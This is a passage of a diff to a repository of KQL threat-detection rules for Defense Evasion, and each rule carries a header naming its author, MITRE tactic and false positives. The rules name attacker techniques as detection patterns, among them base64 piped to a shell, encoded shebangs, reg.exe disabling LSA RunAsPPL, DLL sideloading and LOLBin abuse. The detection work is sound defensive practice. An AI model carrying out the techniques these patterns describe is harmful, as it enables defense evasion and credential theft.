endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\finger.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\hh.exe") and (FolderPath endswith ".zip" or FolderPath endswith ".rar" or FolderPath endswith ".7z" or FolderPath endswith ".diagcab" or FolderPath endswith ".appx") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql b/KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql index ae11a00a..6f51b276 100644 --- a/KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql +++ b/KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql @@ -1,10 +1,10 @@ -// Title: Legitimate Application Dropped Executable -// Author: frack113, Florian Roth (Nextron Systems) -// Date: 2022-08-21 -// Level: high -// Description: Detects programs on a Windows system that should not write executables to disk -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceFileEvents +// Title: Legitimate Application Dropped Executable +// Author: frack113, Florian Roth (Nextron Systems) +// Date: 2022-08-21 +// Level: high +// Description: Detects programs on a Windows system that should not write executables to disk +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".ocx") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql b/KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql index 33903996..3403e948 100644 --- a/KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql +++ b/KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql @@ -1,10 +1,10 @@ -// Title: Legitimate Application Dropped Script -// Author: frack113, Florian Roth (Nextron Systems) -// Date: 2022-08-21 -// Level: high -// Description: Detects programs on a Windows system that should not write scripts to disk -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceFileEvents +// Title: Legitimate Application Dropped Script +// Author: frack113, Florian Roth (Nextron Systems) +// Date: 2022-08-21 +// Level: high +// Description: Detects programs on a Windows system that should not write scripts to disk +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".vbs" or FolderPath endswith ".scf" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql b/KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql index 190919e4..ff5fb23f 100644 --- a/KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql +++ b/KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql @@ -1,12 +1,12 @@ -// Title: Linux Base64 Encoded Pipe to Shell -// Author: pH-T (Nextron Systems) -// Date: 2022-07-26 -// Level: medium -// Description: Detects suspicious process command line that uses base64 encoded input for execution with a shell -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1140 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Linux Base64 Encoded Pipe to Shell +// Author: pH-T (Nextron Systems) +// Date: 2022-07-26 +// Level: medium +// Description: Detects suspicious process command line that uses base64 encoded input for execution with a shell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ProcessCommandLine contains "base64 " and ((ProcessCommandLine contains "| bash " or ProcessCommandLine contains "| sh " or ProcessCommandLine contains "|bash " or ProcessCommandLine contains "|sh ") or (ProcessCommandLine endswith " |sh" or ProcessCommandLine endswith "| bash" or ProcessCommandLine endswith "| sh" or ProcessCommandLine endswith "|bash")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql b/KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql index fc0293f8..5039075a 100644 --- a/KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql +++ b/KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql @@ -1,12 +1,12 @@ -// Title: Linux Base64 Encoded Shebang In CLI -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-15 -// Level: medium -// Description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1140 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Linux Base64 Encoded Shebang In CLI +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-15 +// Level: medium +// Description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ProcessCommandLine contains "IyEvYmluL2Jhc2" or ProcessCommandLine contains "IyEvYmluL2Rhc2" or ProcessCommandLine contains "IyEvYmluL3pza" or ProcessCommandLine contains "IyEvYmluL2Zpc2" or ProcessCommandLine contains "IyEvYmluL3No" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql b/KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql index 52ea8311..03d91df4 100644 --- a/KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql +++ b/KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql @@ -1,12 +1,12 @@ -// Title: Linux Doas Conf File Creation -// Author: Sittikorn S, Teoderick Contreras -// Date: 2022-01-20 -// Level: medium -// Description: Detects the creation of doas.conf file in linux host platform. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548 -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Linux Doas Conf File Creation +// Author: Sittikorn S, Teoderick Contreras +// Date: 2022-01-20 +// Level: medium +// Description: Detects the creation of doas.conf file in linux host platform. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548 +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath endswith "/etc/doas.conf" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/linux_doas_tool_execution.kql b/KQL/rules/Defense Evasion/linux_doas_tool_execution.kql index 5d86ef35..ef61492e 100644 --- a/KQL/rules/Defense Evasion/linux_doas_tool_execution.kql +++ b/KQL/rules/Defense Evasion/linux_doas_tool_execution.kql @@ -1,12 +1,12 @@ -// Title: Linux Doas Tool Execution -// Author: Sittikorn S, Teoderick Contreras -// Date: 2022-01-20 -// Level: low -// Description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Linux Doas Tool Execution +// Author: Sittikorn S, Teoderick Contreras +// Date: 2022-01-20 +// Level: low +// Description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "/doas" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/linux_package_uninstall.kql b/KQL/rules/Defense Evasion/linux_package_uninstall.kql index cd19f090..458dd45e 100644 --- a/KQL/rules/Defense Evasion/linux_package_uninstall.kql +++ b/KQL/rules/Defense Evasion/linux_package_uninstall.kql @@ -1,12 +1,12 @@ -// Title: Linux Package Uninstall -// Author: Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-09 -// Level: low -// Description: Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg". -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070 -// False Positives: -// - Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting). - -DeviceProcessEvents +// Title: Linux Package Uninstall +// Author: Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-09 +// Level: low +// Description: Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 +// False Positives: +// - Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting). + +DeviceProcessEvents | where ((ProcessCommandLine contains "remove" or ProcessCommandLine contains "purge") and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")) or ((ProcessCommandLine contains "--remove " or ProcessCommandLine contains " -r ") and FolderPath endswith "/dpkg") or (ProcessCommandLine contains " -e " and FolderPath endswith "/rpm") or ((ProcessCommandLine contains "erase" or ProcessCommandLine contains "remove") and FolderPath endswith "/yum") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql b/KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql index 0131181d..33a42a90 100644 --- a/KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql +++ b/KQL/rules/Defense Evasion/linux_shell_pipe_to_shell.kql @@ -1,12 +1,12 @@ -// Title: Linux Shell Pipe to Shell -// Author: Florian Roth (Nextron Systems) -// Date: 2022-03-14 -// Level: medium -// Description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1140 -// False Positives: -// - Legitimate software that uses these patterns - -DeviceProcessEvents +// Title: Linux Shell Pipe to Shell +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-14 +// Level: medium +// Description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140 +// False Positives: +// - Legitimate software that uses these patterns + +DeviceProcessEvents | where (ProcessCommandLine startswith "sh -c " or ProcessCommandLine startswith "bash -c ") and ((ProcessCommandLine contains "| bash " or ProcessCommandLine contains "| sh " or ProcessCommandLine contains "|bash " or ProcessCommandLine contains "|sh ") or (ProcessCommandLine endswith "| bash" or ProcessCommandLine endswith "| sh" or ProcessCommandLine endswith "|bash" or ProcessCommandLine endswith " |sh")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/livekd_driver_creation.kql b/KQL/rules/Defense Evasion/livekd_driver_creation.kql index bc4f6a1c..50f9001f 100644 --- a/KQL/rules/Defense Evasion/livekd_driver_creation.kql +++ b/KQL/rules/Defense Evasion/livekd_driver_creation.kql @@ -1,12 +1,12 @@ -// Title: LiveKD Driver Creation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-16 -// Level: medium -// Description: Detects the creation of the LiveKD driver, which is used for live kernel debugging -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation -// False Positives: -// - Legitimate usage of LiveKD for debugging purposes will also trigger this - -DeviceFileEvents +// Title: LiveKD Driver Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-16 +// Level: medium +// Description: Detects the creation of the LiveKD driver, which is used for live kernel debugging +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation +// False Positives: +// - Legitimate usage of LiveKD for debugging purposes will also trigger this + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe") and FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql b/KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql index b9eca040..0444f8ca 100644 --- a/KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql +++ b/KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql @@ -1,12 +1,12 @@ -// Title: LiveKD Driver Creation By Uncommon Process -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-16 -// Level: high -// Description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe". -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation -// False Positives: -// - Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter - -DeviceFileEvents +// Title: LiveKD Driver Creation By Uncommon Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-16 +// Level: high +// Description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation +// False Positives: +// - Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter + +DeviceFileEvents | where FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS" and (not((InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql b/KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql index a424efd2..e06764b1 100644 --- a/KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql +++ b/KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql @@ -1,12 +1,12 @@ -// Title: LiveKD Kernel Memory Dump File Created -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-16 -// Level: high -// Description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation -// False Positives: -// - In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary. - -DeviceFileEvents +// Title: LiveKD Kernel Memory Dump File Created +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-16 +// Level: high +// Description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation +// False Positives: +// - In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary. + +DeviceFileEvents | where FolderPath =~ "C:\\Windows\\livekd.dmp" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql b/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql index e7ac1c5e..1b4ef6c4 100644 --- a/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql +++ b/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql @@ -1,10 +1,10 @@ -// Title: LOL-Binary Copied From System Directory -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-29 -// Level: high -// Description: Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.003 - -DeviceProcessEvents +// Title: LOL-Binary Copied From System Directory +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-29 +// Level: high +// Description: Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 + +DeviceProcessEvents | where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and ((ProcessCommandLine contains "\\bitsadmin.exe" or ProcessCommandLine contains "\\calc.exe" or ProcessCommandLine contains "\\certutil.exe" or ProcessCommandLine contains "\\cmdl32.exe" or ProcessCommandLine contains "\\cscript.exe" or ProcessCommandLine contains "\\mshta.exe" or ProcessCommandLine contains "\\rundll32.exe" or ProcessCommandLine contains "\\wscript.exe") and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql b/KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql index 742abfac..18e0d02a 100644 --- a/KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql +++ b/KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql @@ -1,10 +1,10 @@ -// Title: Lolbin Runexehelper Use As Proxy -// Author: frack113 -// Date: 2022-12-29 -// Level: medium -// Description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: Lolbin Runexehelper Use As Proxy +// Author: frack113 +// Date: 2022-12-29 +// Level: medium +// Description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\runexehelper.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql b/KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql index 0a173df7..4ebe6505 100644 --- a/KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql +++ b/KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql @@ -1,10 +1,10 @@ -// Title: Lolbin Unregmp2.exe Use As Proxy -// Author: frack113 -// Date: 2022-12-29 -// Level: medium -// Description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: Lolbin Unregmp2.exe Use As Proxy +// Author: frack113 +// Date: 2022-12-29 +// Level: medium +// Description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where (ProcessCommandLine contains " -HideWMP" or ProcessCommandLine contains " /HideWMP" or ProcessCommandLine contains " –HideWMP" or ProcessCommandLine contains " —HideWMP" or ProcessCommandLine contains " ―HideWMP") and (FolderPath endswith "\\unregmp2.exe" or ProcessVersionInfoOriginalFileName =~ "unregmp2.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql b/KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql index 8f9f4436..601077fd 100644 --- a/KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql +++ b/KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql @@ -1,12 +1,12 @@ -// Title: LSA PPL Protection Disabled Via Reg.EXE -// Author: Florian Roth (Nextron Systems) -// Date: 2022-03-22 -// Level: high -// Description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.010 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: LSA PPL Protection Disabled Via Reg.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-22 +// Level: high +// Description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.010 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Control\\Lsa" and (ProcessCommandLine contains " add " and ProcessCommandLine contains " /d 0" and ProcessCommandLine contains " /v RunAsPPL ")) and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql b/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql index a455041d..163b5085 100644 --- a/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql +++ b/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql @@ -1,14 +1,14 @@ -// Title: Malicious PE Execution by Microsoft Visual Studio Debugger -// Author: Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community -// Date: 2020-10-14 -// Level: medium -// Description: There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. -// This option may be used adversaries to execute malicious code by signed verified binary. -// The debugger is installed alongside with Microsoft Visual Studio package. -// MITRE Tactic: Defense Evasion -// Tags: attack.t1218, attack.defense-evasion -// False Positives: -// - The process spawned by vsjitdebugger.exe is uncommon. - -DeviceProcessEvents +// Title: Malicious PE Execution by Microsoft Visual Studio Debugger +// Author: Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community +// Date: 2020-10-14 +// Level: medium +// Description: There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. +// This option may be used adversaries to execute malicious code by signed verified binary. +// The debugger is installed alongside with Microsoft Visual Studio package. +// MITRE Tactic: Defense Evasion +// Tags: attack.t1218, attack.defense-evasion +// False Positives: +// - The process spawned by vsjitdebugger.exe is uncommon. + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\vsjitdebugger.exe" and (not(((FolderPath contains "\\vsimmersiveactivatehelper" and FolderPath contains ".exe") or FolderPath endswith "\\devenv.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql b/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql index a29cf4ec..d8c763af 100644 --- a/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql +++ b/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql @@ -1,13 +1,13 @@ -// Title: Malicious Windows Script Components File Execution by TAEF Detection -// Author: Agro (@agro_sev) oscd.community -// Date: 2020-10-13 -// Level: low -// Description: Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces -// Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - It's not an uncommon to use te.exe directly to execute legal TAEF tests - -DeviceProcessEvents +// Title: Malicious Windows Script Components File Execution by TAEF Detection +// Author: Agro (@agro_sev) oscd.community +// Date: 2020-10-13 +// Level: low +// Description: Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces +// Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - It's not an uncommon to use te.exe directly to execute legal TAEF tests + +DeviceProcessEvents | where FolderPath endswith "\\te.exe" or InitiatingProcessFolderPath endswith "\\te.exe" or ProcessVersionInfoOriginalFileName =~ "\\te.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql b/KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql index 60e245fe..a8f212f6 100644 --- a/KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql +++ b/KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql @@ -1,10 +1,10 @@ -// Title: Mavinject Inject DLL Into Running Process -// Author: frack113, Florian Roth -// Date: 2021-07-12 -// Level: high -// Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055.001, attack.t1218.013 - -DeviceProcessEvents +// Title: Mavinject Inject DLL Into Running Process +// Author: frack113, Florian Roth +// Date: 2021-07-12 +// Level: high +// Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055.001, attack.t1218.013 + +DeviceProcessEvents | where ProcessCommandLine contains " /INJECTRUNNING " and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\AppVClient.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql b/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql index 7e5e0151..90821ff7 100644 --- a/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql +++ b/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql @@ -1,12 +1,12 @@ -// Title: MaxMpxCt Registry Value Changed -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-03-19 -// Level: low -// Description: Detects changes to the "MaxMpxCt" registry value. -// MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate. -// Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.005 - -DeviceRegistryEvents +// Title: MaxMpxCt Registry Value Changed +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-03-19 +// Level: low +// Description: Detects changes to the "MaxMpxCt" registry value. +// MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate. +// Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.005 + +DeviceRegistryEvents | where RegistryKey endswith "\\Services\\LanmanServer\\Parameters\\MaxMpxCt" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql b/KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql index e359d1c3..cc3a6a0c 100644 --- a/KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql +++ b/KQL/rules/Defense Evasion/microsoft_office_dll_sideload.kql @@ -1,12 +1,12 @@ -// Title: Microsoft Office DLL Sideload -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022-08-17 -// Level: high -// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Microsoft Office DLL Sideload +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) +// Date: 2022-08-17 +// Level: high +// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where FolderPath endswith "\\outllib.dll" and (not((FolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql b/KQL/rules/Defense 